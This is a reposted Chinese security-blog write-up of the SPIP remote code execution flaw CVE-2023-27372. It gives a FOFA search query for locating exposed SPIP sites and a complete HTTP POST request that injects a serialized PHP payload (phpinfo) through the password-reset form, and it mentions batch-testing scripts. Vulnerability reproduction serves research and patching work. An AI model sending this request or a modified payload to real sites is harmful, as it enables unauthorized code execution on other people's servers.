【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

admin 2023年7月14日03:13:02评论245 views1字数 1088阅读3分37秒阅读模式

免责声明

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)
【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

漏洞简述

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

SPIP是SPIP的一个用于创建 Internet 站点的免费软件。SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,重置密码时 protege_champ()函数没有对序列化字符串进行过滤,因为序列化处理不当,没有对序列化字符串进行过滤,从而触发命令执行漏洞。攻击者利用该漏洞可以远程执行代码。

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

漏洞影响

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)
spip < 4.1.8 spip < 4.0.10 spip < 3.2.18

漏洞复现

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)
fofa:app="SPIP" && icon_hash="-1224668706" && "/spip.php?page=spip_pass"

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

POST /spip.php?page=spip_pass HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 120Connection: closeUpgrade-Insecure-Requests: 1
page=spip_pass&formulaire_action=oubli&formulaire_action_args=0MEdEvgsiymxg%2B27bLIDEjnZOb16PsF4D1sw6PJDJLKydytv0Jn1JlktUB%2Bzt68vZDJAAvO4vWR63WI%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

Nuclei 插件测试

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

编写python脚本批量测试

【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

获取 POC

https://github.com/nuts7/CVE-2023-27372

End

原文始发于微信公众号(贝雷帽SEC):【漏洞复现】SPIP RCE CVE-2023-27372 (POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月14日03:13:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】SPIP RCE CVE-2023-27372 (POC)http://cn-sec.com/archives/1874816.html

发表评论

匿名网友 填写信息